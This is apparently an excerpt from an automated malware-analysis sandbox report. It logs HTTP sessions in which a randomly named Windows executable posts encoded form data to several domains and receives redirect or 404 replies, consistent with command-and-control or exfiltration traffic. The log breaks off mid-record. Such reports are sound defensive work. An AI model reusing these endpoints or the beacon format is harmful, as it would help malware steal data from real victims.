4f 76 4f 6c 34 6d 32 65 7a 49 55 7a 68 55 58 74 36 43 37 2b 46 77 38 66 55 35 4d 69 46 4a 61 74 57 77 71 70 54 4b 4b 49 38 2f 4b 37 73 6b 53 6d 4a 76 63 54 62 50 51 72 70 70 35 4e 73 4c 36 72 64 4e 65 36 32 32 4d 4e 69 78 49 51 42 69 67 49 49 59 61 68 46 2b 47 51 5a 54 78 69 58 51 79 4e 71 43 4e 4f 44 71 4a 30 4d 32 72 69 6f 3d Data Ascii: GX4dS=11MsekklmB0gNaHf7DjSxadcjk5876TPTRGU6JOcLbM2wnhVvgi2e+vVQ1gf9I7X3HuhbzA3CocJ6X1tNi+UEPRbTGuAAF9FSeCVX1xaP7OvOl4m2ezIUzhUXt6C7+Fw8fU5MiFJatWwqpTKKI8/K7skSmJvcTbPQrpp5NsL6rdNe622MNixIQBigIIYahF+GQZTxiXQyNqCNODqJ0M2rio=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	57413	13.248.169.48	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:30.028901100 CEST	10843	OUT	POST /a1sy/ HTTP/1.1 Host: www.appointy.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.appointy.shop Referer: http://www.appointy.shop/a1sy/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10302 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 31 31 4d 73 65 6b 6b 6c 6d 42 30 67 4e 61 48 66 37 44 6a 53 78 61 64 63 6a 6b 35 38 37 36 54 50 54 52 47 55 36 4a 4f 63 4c 62 55 32 33 56 70 56 75 44 4b 32 66 2b 76 56 54 31 67 61 39 49 36 56 33 48 6d 39 62 7a 46 41 43 72 6b 4a 37 31 52 74 4b 54 2b 55 50 50 52 62 64 57 75 44 4f 6c 38 52 53 65 53 52 58 31 42 61 50 37 4f 76 4f 6b 49 6d 2f 76 7a 49 57 7a 68 58 51 74 36 4f 2f 2b 45 58 38 62 41 50 4d 69 42 5a 61 64 32 77 71 4e 50 4b 46 64 49 2f 43 37 73 6d 52 6d 49 38 63 54 58 41 51 72 6c 54 35 4e 59 74 36 72 70 4e 64 73 48 32 66 63 4b 56 61 67 51 34 34 4c 38 46 58 68 42 42 49 52 6c 37 68 43 47 4b 71 39 36 41 47 5a 57 43 54 6e 49 4b 35 6b 46 2b 49 65 45 76 66 6f 64 7a 53 35 33 73 47 68 75 33 31 71 6d 39 30 49 46 66 4a 68 55 6a 46 4a 37 42 65 48 62 38 75 71 64 59 50 44 58 36 4d 74 4f 79 52 61 63 4a 36 4a 35 57 58 4a 4e 2b 55 52 56 52 41 78 37 74 5a 6b 32 34 43 72 42 5a 50 4f 4b 75 33 6c 39 2b 61 32 45 6e 77 2b 57 36 39 69 54 6f 76 69 44 46 2f 74 35 36 43 56 53 70 4e 35 54 65 32 50 57 74 [TRUNCATED] Data Ascii: GX4dS=11MsekklmB0gNaHf7DjSxadcjk5876TPTRGU6JOcLbU23VpVuDK2f+vVT1ga9I6V3Hm9bzFACrkJ71RtKT+UPPRbdWuDOl8RSeSRX1BaP7OvOkIm/vzIWzhXQt6O/+EX8bAPMiBZad2wqNPKFdI/C7smRmI8cTXAQrlT5NYt6rpNdsH2fcKVagQ44L8FXhBBIRl7hCGKq96AGZWCTnIK5kF+IeEvfodzS53sGhu31qm90IFfJhUjFJ7BeHb8uqdYPDX6MtOyRacJ6J5WXJN+URVRAx7tZk24CrBZPOKu3l9+a2Enw+W69iToviDF/t56CVSpN5Te2PWtMjrk+pqzvDvxc+7IK2G3AO1M1b6GX2ZThCykKLj+fz2NyE3r2WMe+vJB6KEHJCf/7OAWfSoU0biMHk4SU5j9SALrdgHjEn5/FSMLgphRBfJB3/VI3FF7fRjBPLdHx3KAX5WD/xBBfNzz8YhAPOTU41vub8oI/kGV3fysZPzNEKSx07ce/1xAukEppBDh7sw1Ogs7AtrCysRSzwcEYbXmUBd8P4f3GG1FKxyugKNNSfmcxtUSxQwacSv3R8ccaPsBVGoDq4cw/RcKbKv5EVJAXwEgntI/4A9tbcBoLccyCrAoZWPHYw/rwhOqGqegVLTDb09dcod4X2qOJ/EBajNAkiMxOifnHAe0xMVP8aWsSGavkLxlRDfE6iF907TPuDO/9jeJ0rQbqC1Ex75RX6jDZSRu1TtuHMMw6qnTA/A4Dl2UsgzPI2kdCD8OkVZUDaTe8bXRRCHsUSfDw80Cma+qD8Nyd/ZHX8V3vhbI2nLbmRktMHYyMo3Wy203cCCSTgSLuH+mduXVk2kHrzbuRWShtkN+UH2wGLPW+p79A69i+0ocLrLFJhtsH6HoQDc4Zlluh9QzWYajOz6oXp2dKLUBvjTSdpdBjisnQp9DIRzBqtwSFD7to61PpmtSAz7M7p4iPjFxIi/lEts4nS+LvksiAc51pk1ID60xD1 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	57414	13.248.169.48	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:32.563107014 CEST	470	OUT	GET /a1sy/?GX4dS=43kMdQUk4RwRJMi6yD+2w8EPj2c5h/nzCBj69vS+SY4LuE9CgiSoK5ODTlc+3PfTwBmzR2IwCrk+5EAKTw2sMvYmaCzYBStST9GoSzlhXbP5C08N1MLucTc=&QHdD=Mr7PG HTTP/1.1 Host: www.appointy.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Sep 30, 2024 08:32:33.016081095 CEST	392	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 30 Sep 2024 06:32:32 GMT Content-Type: text/html Content-Length: 252 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 58 34 64 53 3d 34 33 6b 4d 64 51 55 6b 34 52 77 52 4a 4d 69 36 79 44 2b 32 77 38 45 50 6a 32 63 35 68 2f 6e 7a 43 42 6a 36 39 76 53 2b 53 59 34 4c 75 45 39 43 67 69 53 6f 4b 35 4f 44 54 6c 63 2b 33 50 66 54 77 42 6d 7a 52 32 49 77 43 72 6b 2b 35 45 41 4b 54 77 32 73 4d 76 59 6d 61 43 7a 59 42 53 74 53 54 39 47 6f 53 7a 6c 68 58 62 50 35 43 30 38 4e 31 4d 4c 75 63 54 63 3d 26 51 48 64 44 3d 4d 72 37 50 47 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GX4dS=43kMdQUk4RwRJMi6yD+2w8EPj2c5h/nzCBj69vS+SY4LuE9CgiSoK5ODTlc+3PfTwBmzR2IwCrk+5EAKTw2sMvYmaCzYBStST9GoSzlhXbP5C08N1MLucTc=&QHdD=Mr7PG"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	57415	3.33.130.190	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:38.093266964 CEST	735	OUT	POST /prdf/ HTTP/1.1 Host: www.30kfeet.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.30kfeet.net Referer: http://www.30kfeet.net/prdf/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 202 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 41 39 69 6b 46 32 47 77 75 46 47 54 52 62 52 37 66 37 6c 44 39 59 71 32 4d 74 44 71 58 55 55 68 57 72 30 45 54 4a 41 41 56 4d 58 67 46 56 4d 57 32 70 5a 6f 55 66 75 69 73 54 39 32 74 4c 61 37 53 61 69 6b 71 54 61 30 43 73 32 75 76 31 33 66 6c 79 38 75 36 71 79 55 68 44 66 48 4f 2f 6a 6e 78 6d 54 51 4d 6a 50 47 4c 73 6c 30 77 72 62 59 47 43 31 39 44 5a 73 59 75 48 37 68 68 57 4f 42 75 43 4e 6b 39 33 54 6b 7a 58 39 51 6b 70 38 52 2b 50 41 62 78 53 43 45 64 2f 65 33 55 42 54 41 5a 43 79 55 6a 6e 59 44 43 50 56 57 70 50 5a 46 33 49 37 58 54 5a 65 4f 31 5a 36 5a 32 64 73 58 34 77 3d 3d Data Ascii: GX4dS=A9ikF2GwuFGTRbR7f7lD9Yq2MtDqXUUhWr0ETJAAVMXgFVMW2pZoUfuisT92tLa7SaikqTa0Cs2uv13fly8u6qyUhDfHO/jnxmTQMjPGLsl0wrbYGC19DZsYuH7hhWOBuCNk93TkzX9Qkp8R+PAbxSCEd/e3UBTAZCyUjnYDCPVWpPZF3I7XTZeO1Z6Z2dsX4w==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	57416	3.33.130.190	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:40.645160913 CEST	755	OUT	POST /prdf/ HTTP/1.1 Host: www.30kfeet.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.30kfeet.net Referer: http://www.30kfeet.net/prdf/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 222 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 41 39 69 6b 46 32 47 77 75 46 47 54 52 36 42 37 5a 59 64 44 38 34 71 70 47 4e 44 71 5a 30 55 6c 57 72 6f 45 54 49 55 71 55 2b 7a 67 46 77 6f 57 33 72 39 6f 56 66 75 69 6a 7a 39 33 6e 72 61 77 53 61 76 62 71 57 69 30 43 73 53 75 76 33 2f 66 6c 68 55 76 31 61 79 4b 75 6a 66 2f 57 66 6a 6e 78 6d 54 51 4d 6a 4c 38 4c 76 56 30 77 62 4c 59 58 58 5a 2b 64 4a 73 62 34 58 37 68 6c 57 4f 46 75 43 4d 42 39 79 7a 4f 7a 56 46 51 6b 6f 4d 52 2b 62 63 55 36 53 43 64 5a 2f 66 54 54 69 43 6b 5a 33 4b 63 6c 78 59 74 44 75 41 79 6f 4a 49 66 6d 35 61 41 42 5a 36 39 6f 65 7a 74 37 65 52 65 6a 31 62 35 59 5a 56 5a 76 36 6e 32 32 76 58 41 4b 55 53 35 4d 43 73 3d Data Ascii: GX4dS=A9ikF2GwuFGTR6B7ZYdD84qpGNDqZ0UlWroETIUqU+zgFwoW3r9oVfuijz93nrawSavbqWi0CsSuv3/flhUv1ayKujf/WfjnxmTQMjL8LvV0wbLYXXZ+dJsb4X7hlWOFuCMB9yzOzVFQkoMR+bcU6SCdZ/fTTiCkZ3KclxYtDuAyoJIfm5aABZ69oezt7eRej1b5YZVZv6n22vXAKUS5MCs=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	57417	3.33.130.190	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:43.192790031 CEST	10837	OUT	POST /prdf/ HTTP/1.1 Host: www.30kfeet.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.30kfeet.net Referer: http://www.30kfeet.net/prdf/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10302 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 41 39 69 6b 46 32 47 77 75 46 47 54 52 36 42 37 5a 59 64 44 38 34 71 70 47 4e 44 71 5a 30 55 6c 57 72 6f 45 54 49 55 71 55 2b 37 67 46 6d 30 57 31 4b 39 6f 50 66 75 69 71 54 39 4d 6e 72 61 74 53 61 6e 66 71 57 65 6b 43 75 36 75 75 55 6e 66 78 41 55 76 75 71 79 4b 6c 44 66 45 4f 2f 6a 2b 78 6d 44 63 4d 6a 62 38 4c 76 56 30 77 65 48 59 48 79 31 2b 66 4a 73 59 75 48 37 39 68 57 4f 74 75 43 46 38 39 79 2f 30 30 6d 4e 51 6e 49 63 52 39 75 41 55 34 79 43 49 55 66 66 4c 54 69 4f 37 5a 33 2f 6e 6c 78 45 48 44 75 30 79 6f 34 68 35 78 4b 57 6e 66 37 75 46 79 38 66 4f 7a 4d 70 6f 34 33 58 41 63 35 78 39 77 49 6e 4c 32 73 6d 4b 51 52 43 31 59 6c 6a 62 62 48 42 32 54 41 7a 72 52 42 77 72 4b 2f 2b 51 55 4c 79 55 4e 73 42 79 4b 2f 36 5a 33 65 67 4b 44 77 66 32 39 55 42 6b 67 55 61 59 74 41 49 71 59 6f 41 54 32 50 6b 65 45 6c 46 47 6d 63 53 71 2b 41 61 4b 34 55 2f 78 74 56 4f 5a 77 4a 30 39 57 6c 30 7a 77 4f 41 68 48 38 4b 70 6b 5a 64 44 38 6c 45 51 49 38 73 2f 45 49 53 2f 38 36 37 6e 63 39 4f 44 [TRUNCATED] Data Ascii: GX4dS=A9ikF2GwuFGTR6B7ZYdD84qpGNDqZ0UlWroETIUqU+7gFm0W1K9oPfuiqT9MnratSanfqWekCu6uuUnfxAUvuqyKlDfEO/j+xmDcMjb8LvV0weHYHy1+fJsYuH79hWOtuCF89y/00mNQnIcR9uAU4yCIUffLTiO7Z3/nlxEHDu0yo4h5xKWnf7uFy8fOzMpo43XAc5x9wInL2smKQRC1YljbbHB2TAzrRBwrK/+QULyUNsByK/6Z3egKDwf29UBkgUaYtAIqYoAT2PkeElFGmcSq+AaK4U/xtVOZwJ09Wl0zwOAhH8KpkZdD8lEQI8s/EIS/867nc9ODwTgz/svDOh4Z5/CxpM0krGhmxyYdAbOMTIV++n0ZJGWAVIYrNsZJA3qAPy9ZgI3v9lHF6o5xt+W0hSWCcdeAMfd2av/h461ph6Ahb9t+nlc46IpJdpOFVlh5x0KVy1Jgs73h0oTvf2ai6TCwnvpHkTBsCZWhgubBlEwdlMY4X6YLI5ywqd9k/WT8TGkTuU6OFoxt4Xfx4yo+yanAYnQAvEWztGA2FgOEsD2LY5oQMuRoM0mgqrO7+kWxYvZthuLCempCuzo4hfacks08dZo8+brEn3gq6Zca9A3h1oNRNXZilBU4QMYuhKI2R0kVinU3dtoUa4Tv1ZdIps6A656QTNiwOJKFNhujC78aZVPzr5btaK+LcYpkLiSsEhcVYZ0B20bvluy6nvhF/8ddss8zXBsPnl6VUzI2YN2lYRWzuCB6Gqb+nW51OAeX7W668VdGgc4r/Bc9VKyVo+npU57/YNiibxH8tBGJO6kcqpwi6W4e7BZvNixZkj/Qd+eRo4Sz9pIH0q5Twh1PAhxMaUehmwk2F1irhwfPZAaGBmW9HLXUB8I7B/9FmdBFBW7ic1l1pSNnsHiR0VsKe+ANbqhQVyQHIMtjW0R2RdMITkoM1QJErfGz4oA5edr2Asb/K6JsLhpQIzTRNPj6SKEVrRldP+r24XFOQFTZnu [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	57418	3.33.130.190	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:45.734958887 CEST	468	OUT	GET /prdf/?QHdD=Mr7PG&GX4dS=N/KEGDqp5WK7R7QNRoFQ4/TvMZ3DPGQhB7JjPYgVV+XpEUcX47NGW/blkAtXlqOMddn0lmmWVt6FtFHbnRpj1unWlirPQI35p0XdBkbFDcY28+naIT5FW58= HTTP/1.1 Host: www.30kfeet.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Sep 30, 2024 08:32:46.183098078 CEST	392	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 30 Sep 2024 06:32:46 GMT Content-Type: text/html Content-Length: 252 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 48 64 44 3d 4d 72 37 50 47 26 47 58 34 64 53 3d 4e 2f 4b 45 47 44 71 70 35 57 4b 37 52 37 51 4e 52 6f 46 51 34 2f 54 76 4d 5a 33 44 50 47 51 68 42 37 4a 6a 50 59 67 56 56 2b 58 70 45 55 63 58 34 37 4e 47 57 2f 62 6c 6b 41 74 58 6c 71 4f 4d 64 64 6e 30 6c 6d 6d 57 56 74 36 46 74 46 48 62 6e 52 70 6a 31 75 6e 57 6c 69 72 50 51 49 33 35 70 30 58 64 42 6b 62 46 44 63 59 32 38 2b 6e 61 49 54 35 46 57 35 38 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QHdD=Mr7PG&GX4dS=N/KEGDqp5WK7R7QNRoFQ4/TvMZ3DPGQhB7JjPYgVV+XpEUcX47NGW/blkAtXlqOMddn0lmmWVt6FtFHbnRpj1unWlirPQI35p0XdBkbFDcY28+naIT5FW58="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	57419	8.217.17.192	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:51.229427099 CEST	750	OUT	POST /v6hi/ HTTP/1.1 Host: www.meliorahomes.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.meliorahomes.net Referer: http://www.meliorahomes.net/v6hi/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 202 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 45 36 6d 35 54 77 31 38 6d 57 7a 37 43 6f 38 78 61 43 6d 39 68 6b 58 59 42 6a 56 43 76 56 7a 30 74 47 6a 6b 37 51 45 79 66 7a 32 49 68 76 66 43 62 38 4a 6d 34 4f 64 52 2f 66 43 54 4f 6e 68 54 62 68 61 50 37 78 4b 75 57 4b 31 74 72 75 59 37 65 78 63 78 4c 33 4d 50 77 45 6a 30 45 68 6a 45 49 43 4e 74 58 4a 49 6e 30 4b 6c 31 76 65 30 54 35 51 78 79 51 75 78 41 6f 33 31 64 64 4a 32 59 44 56 4d 72 68 74 36 45 55 6e 37 50 53 52 74 54 50 6e 30 35 6b 72 69 39 76 73 4f 2b 31 5a 76 6a 52 45 77 37 41 6e 57 4b 75 67 53 45 74 50 4c 71 41 59 6c 37 33 71 44 78 2b 44 4b 46 66 4b 30 50 32 77 3d 3d Data Ascii: GX4dS=E6m5Tw18mWz7Co8xaCm9hkXYBjVCvVz0tGjk7QEyfz2IhvfCb8Jm4OdR/fCTOnhTbhaP7xKuWK1truY7excxL3MPwEj0EhjEICNtXJIn0Kl1ve0T5QxyQuxAo31ddJ2YDVMrht6EUn7PSRtTPn05kri9vsO+1ZvjREw7AnWKugSEtPLqAYl73qDx+DKFfK0P2w==
Sep 30, 2024 08:32:52.121453047 CEST	393	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 06:32:51 GMT Server: Apache/2.4.6 (CentOS) PHP/7.2.34 Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 36 68 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /v6hi/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	57420	8.217.17.192	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:53.772381067 CEST	770	OUT	POST /v6hi/ HTTP/1.1 Host: www.meliorahomes.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.meliorahomes.net Referer: http://www.meliorahomes.net/v6hi/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 222 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 45 36 6d 35 54 77 31 38 6d 57 7a 37 43 4a 73 78 64 68 4f 39 67 45 58 5a 66 54 56 43 6c 31 7a 77 74 47 6e 6b 37 53 6f 69 66 68 43 49 68 4c 54 43 4a 39 4a 6d 2f 4f 64 52 6e 76 43 57 44 48 68 6d 62 68 57 48 37 77 32 75 57 4a 4a 74 72 73 51 37 5a 44 30 79 4b 6e 4d 4e 37 6b 6a 79 4b 42 6a 45 49 43 4e 74 58 4b 30 42 30 4b 39 31 76 4f 45 54 32 52 78 31 54 75 78 50 38 6e 31 64 5a 4a 33 66 44 56 4e 4f 68 76 4f 69 55 69 6e 50 53 56 70 54 4d 31 63 34 71 72 69 37 79 38 4f 75 39 6f 48 6f 57 32 68 58 42 46 2b 30 6b 79 2b 66 6f 4a 61 77 52 70 45 73 6c 71 6e 43 6a 45 44 78 53 4a 4a 47 74 35 35 37 46 44 75 70 6c 5a 34 4e 50 39 2b 45 75 44 49 6a 34 59 59 3d Data Ascii: GX4dS=E6m5Tw18mWz7CJsxdhO9gEXZfTVCl1zwtGnk7SoifhCIhLTCJ9Jm/OdRnvCWDHhmbhWH7w2uWJJtrsQ7ZD0yKnMN7kjyKBjEICNtXK0B0K91vOET2Rx1TuxP8n1dZJ3fDVNOhvOiUinPSVpTM1c4qri7y8Ou9oHoW2hXBF+0ky+foJawRpEslqnCjEDxSJJGt557FDuplZ4NP9+EuDIj4YY=
Sep 30, 2024 08:32:54.641823053 CEST	393	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 06:32:54 GMT Server: Apache/2.4.6 (CentOS) PHP/7.2.34 Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 36 68 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /v6hi/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	57421	8.217.17.192	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:56.416913033 CEST	10852	OUT	POST /v6hi/ HTTP/1.1 Host: www.meliorahomes.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.meliorahomes.net Referer: http://www.meliorahomes.net/v6hi/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10302 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 45 36 6d 35 54 77 31 38 6d 57 7a 37 43 4a 73 78 64 68 4f 39 67 45 58 5a 66 54 56 43 6c 31 7a 77 74 47 6e 6b 37 53 6f 69 66 68 36 49 68 59 62 43 62 65 68 6d 2b 4f 64 52 35 66 43 58 44 48 68 42 62 68 65 44 37 77 37 54 57 4d 46 74 71 4a 63 37 59 79 30 79 41 6e 4d 4e 30 45 6a 7a 45 68 6a 72 49 43 39 68 58 4b 6b 42 30 4b 39 31 76 4e 63 54 79 41 78 31 65 4f 78 41 6f 33 30 50 64 4a 33 37 44 52 6f 7a 68 73 6a 5a 56 57 72 50 53 78 4e 54 63 57 30 34 69 72 69 35 78 38 50 78 39 6f 61 77 57 32 74 74 42 46 6d 65 6b 7a 47 66 6c 4d 48 78 4f 4c 63 79 34 63 79 66 32 33 37 69 58 4f 31 4c 72 65 70 65 42 7a 6d 73 78 39 39 6b 4b 50 43 4c 36 47 5a 6a 74 4e 43 72 32 78 47 46 49 70 67 42 79 6a 4d 46 75 6b 48 6e 57 31 55 6c 7a 65 4b 54 42 73 67 56 54 41 36 77 61 75 2b 33 6e 35 77 69 7a 70 63 39 66 38 68 59 75 48 34 71 62 77 4d 51 43 6c 30 79 53 58 36 38 39 70 79 55 57 4d 48 4e 45 6a 74 70 41 61 62 36 50 37 30 7a 33 65 4d 4a 2f 62 68 77 69 68 36 6a 42 33 66 4e 35 35 61 62 52 61 62 5a 4d 78 77 61 6c 78 63 35 [TRUNCATED] Data Ascii: 